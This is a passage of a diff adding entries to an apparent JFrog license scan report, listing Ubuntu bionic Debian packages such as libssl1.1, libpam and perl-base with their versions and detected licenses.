"ubuntu:bionic:liblz4-1:0.0~r131-2ubuntu3.1", + "component_name": "ubuntu:bionic:liblz4-1", + "version": "0.0~r131-2ubuntu3.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:liblz4-1", + "licenses": [ + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:liblzma5:5.2.2-1.3ubuntu0.1", + "component_name": "ubuntu:bionic:liblzma5", + "version": "5.2.2-1.3ubuntu0.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:liblzma5", + "licenses": [ + { + "key": "GPL-2.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libmount1:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:libmount1", + "version": "2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libmount1", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libncurses5:6.1-1ubuntu1.18.04.1", + "component_name": "ubuntu:bionic:libncurses5", + "version": "6.1-1ubuntu1.18.04.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libncurses5", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "X11", + "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libncursesw5:6.1-1ubuntu1.18.04.1", + "component_name": "ubuntu:bionic:libncursesw5", + "version": "6.1-1ubuntu1.18.04.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libncursesw5", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "X11", + "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libnettle6:3.4.1-0ubuntu0.18.04.1", + "component_name": "ubuntu:bionic:libnettle6", + "version": "3.4.1-0ubuntu0.18.04.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libnettle6", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libp11-kit0:0.23.9-2ubuntu0.1", + "component_name": "ubuntu:bionic:libp11-kit0", + "version": "0.23.9-2ubuntu0.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libp11-kit0", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ISC", + "link": "http://www.opensource.org/licenses/ISC", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libpam-modules:1.1.8-3.6ubuntu2.18.04.6", + "component_name": "ubuntu:bionic:libpam-modules", + "version": "1.1.8-3.6ubuntu2.18.04.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libpam-modules", + "licenses": [ + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libpam-modules-bin:1.1.8-3.6ubuntu2.18.04.6", + "component_name": "ubuntu:bionic:libpam-modules-bin", + "version": "1.1.8-3.6ubuntu2.18.04.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libpam-modules-bin", + "licenses": [ + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libpam-runtime:1.1.8-3.6ubuntu2.18.04.6", + "component_name": "ubuntu:bionic:libpam-runtime", + "version": "1.1.8-3.6ubuntu2.18.04.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libpam-runtime", + "licenses": [ + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libpam0g:1.1.8-3.6ubuntu2.18.04.6", + "component_name": "ubuntu:bionic:libpam0g", + "version": "1.1.8-3.6ubuntu2.18.04.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libpam0g", + "licenses": [ + { + "key": "GPL-3.0-only", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libpcre3:2:8.39-9ubuntu0.1", + "component_name": "ubuntu:bionic:libpcre3", + "version": "2:8.39-9ubuntu0.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libpcre3", + "licenses": [ + { + "key": "BSD-3-Clause-Clear", + "link": "http://labs.metacarta.com/license-explanation.html#license", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libprocps6:2:3.3.12-3ubuntu1.2", + "component_name": "ubuntu:bionic:libprocps6", + "version": "2:3.3.12-3ubuntu1.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libprocps6", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libseccomp2:2.5.1-1ubuntu1~18.04.2", + "component_name": "ubuntu:bionic:libseccomp2", + "version": "2.5.1-1ubuntu1~18.04.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libseccomp2", + "licenses": [ + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libselinux1:2.7-2build2", + "component_name": "ubuntu:bionic:libselinux1", + "version": "2.7-2build2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libselinux1", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libsemanage-common:2.7-2build2", + "component_name": "ubuntu:bionic:libsemanage-common", + "version": "2.7-2build2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libsemanage-common", + "licenses": [ + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libsemanage1:2.7-2build2", + "component_name": "ubuntu:bionic:libsemanage1", + "version": "2.7-2build2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libsemanage1", + "licenses": [ + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libsepol1:2.7-1ubuntu0.1", + "component_name": "ubuntu:bionic:libsepol1", + "version": "2.7-1ubuntu0.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libsepol1", + "licenses": [ + { + "key": "LGPL-2.1-only", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libsmartcols1:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:libsmartcols1", + "version": "2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libsmartcols1", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libss2:1.44.1-1ubuntu1.4", + "component_name": "ubuntu:bionic:libss2", + "version": "1.44.1-1ubuntu1.4", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libss2", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libssl1.1:1.1.1-1ubuntu2.1~18.04.23", + "component_name": "ubuntu:bionic:libssl1.1", + "version": "1.1.1-1ubuntu2.1~18.04.23", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libssl1.1", + "licenses": [ + { + "key": "OpenSSL", + "link": "http://www.openssl.org/source/license.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libstdc++6:8.4.0-1ubuntu1~18.04", + "component_name": "ubuntu:bionic:libstdc++6", + "version": "8.4.0-1ubuntu1~18.04", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libstdc++6", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ZLIB", + "link": "http://www.opensource.org/licenses/Zlib", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libsystemd0:237-3ubuntu10.57", + "component_name": "ubuntu:bionic:libsystemd0", + "version": "237-3ubuntu10.57", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libsystemd0", + "licenses": [ + { + "key": "CC0-1.0", + "link": "http://creativecommons.org/publicdomain/zero/1.0/", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libtasn1-6:4.13-2", + "component_name": "ubuntu:bionic:libtasn1-6", + "version": "4.13-2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libtasn1-6", + "licenses": [ + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libtinfo5:6.1-1ubuntu1.18.04.1", + "component_name": "ubuntu:bionic:libtinfo5", + "version": "6.1-1ubuntu1.18.04.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libtinfo5", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "X11", + "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libudev1:237-3ubuntu10.57", + "component_name": "ubuntu:bionic:libudev1", + "version": "237-3ubuntu10.57", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libudev1", + "licenses": [ + { + "key": "CC0-1.0", + "link": "http://creativecommons.org/publicdomain/zero/1.0/", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-only", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libunistring2:0.9.9-0ubuntu2", + "component_name": "ubuntu:bionic:libunistring2", + "version": "0.9.9-0ubuntu2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libunistring2", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libuuid1:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:libuuid1", + "version": "2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libuuid1", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:libyaml-0-2:0.1.7-2ubuntu3", + "component_name": "ubuntu:bionic:libyaml-0-2", + "version": "0.1.7-2ubuntu3", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libyaml-0-2", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + }, + { + "component_id": "ubuntu:bionic:libzstd1:1.3.3+dfsg-2ubuntu1.2", + "component_name": "ubuntu:bionic:libzstd1", + "version": "1.3.3+dfsg-2ubuntu1.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:libzstd1", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ZLIB", + "link": "http://www.opensource.org/licenses/Zlib", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:locales:2.27-3ubuntu1.6", + "component_name": "ubuntu:bionic:locales", + "version": "2.27-3ubuntu1.6", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:locales", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-4-Clause-UC", + "link": "http://www.freebsd.org/copyright/license.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "IETF", + "link": "", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Intel", + "link": "http://opensource.org/licenses/Intel", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "ISC", + "link": "http://www.opensource.org/licenses/ISC", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT-CMU", + "link": "https://fedoraproject.org/wiki/Licensing:MIT?rd=Licensing/MIT#CMU_Style", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Spencer-94", + "link": "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:login:1:4.5-1ubuntu2.5", + "component_name": "ubuntu:bionic:login", + "version": "1:4.5-1ubuntu2.5", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:login", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "TCP-wrappers", + "link": "http://rc.quest.com/topics/openssh/license.php#tcpwrappers", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:lsb-base:9.20170808ubuntu1", + "component_name": "ubuntu:bionic:lsb-base", + "version": "9.20170808ubuntu1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:lsb-base", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:mawk:1.3.3-17ubuntu3", + "component_name": "ubuntu:bionic:mawk", + "version": "1.3.3-17ubuntu3", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:mawk", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:mount:2.31.1-0.4ubuntu3.7", + "component_name": "ubuntu:bionic:mount", + "version": "2.31.1-0.4ubuntu3.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:mount", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD 2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:ncurses-base:6.1-1ubuntu1.18.04.1", + "component_name": "ubuntu:bionic:ncurses-base", + "version": "6.1-1ubuntu1.18.04.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:ncurses-base", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "X11", + "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:ncurses-bin:6.1-1ubuntu1.18.04.1", + "component_name": "ubuntu:bionic:ncurses-bin", + "version": "6.1-1ubuntu1.18.04.1", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:ncurses-bin", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "X11", + "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:netbase:5.4", + "component_name": "ubuntu:bionic:netbase", + "version": "5.4", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:netbase", + "licenses": [ + { + "key": "GPL-2", + "link": "", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:openssl:1.1.1-1ubuntu2.1~18.04.23", + "component_name": "ubuntu:bionic:openssl", + "version": "1.1.1-1ubuntu2.1~18.04.23", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:openssl", + "licenses": [ + { + "key": "OpenSSL", + "link": "http://www.openssl.org/source/license.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:passwd:1:4.5-1ubuntu2.5", + "component_name": "ubuntu:bionic:passwd", + "version": "1:4.5-1ubuntu2.5", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:passwd", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "TCP-wrappers", + "link": "http://rc.quest.com/topics/openssh/license.php#tcpwrappers", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:perl-base:5.26.1-6ubuntu0.7", + "component_name": "ubuntu:bionic:perl-base", + "version": "5.26.1-6ubuntu0.7", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:perl-base", + "licenses": [ + { + "key": "Artistic-2.0", + "link": "http://www.opensource.org/licenses/artistic-license-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "CC0-1.0", + "link": "http://creativecommons.org/publicdomain/zero/1.0/", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0-or-later", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-3.0-or-later", + "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Zlib", + "link": "http://www.opensource.org/licenses/Zlib", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:procps:2:3.3.12-3ubuntu1.2", + "component_name": "ubuntu:bionic:procps", + "version": "2:3.3.12-3ubuntu1.2", + "pkg_type": "deb", + "package_id": "deb://ubuntu:bionic:procps", + "licenses": [ + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-3.0", + "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ubuntu:bionic:sed:4.4-2", + "component_name": "ubuntu:bionic:sed", + "version": "4.4-2", + "pkg_type": "deb", + "package_id": 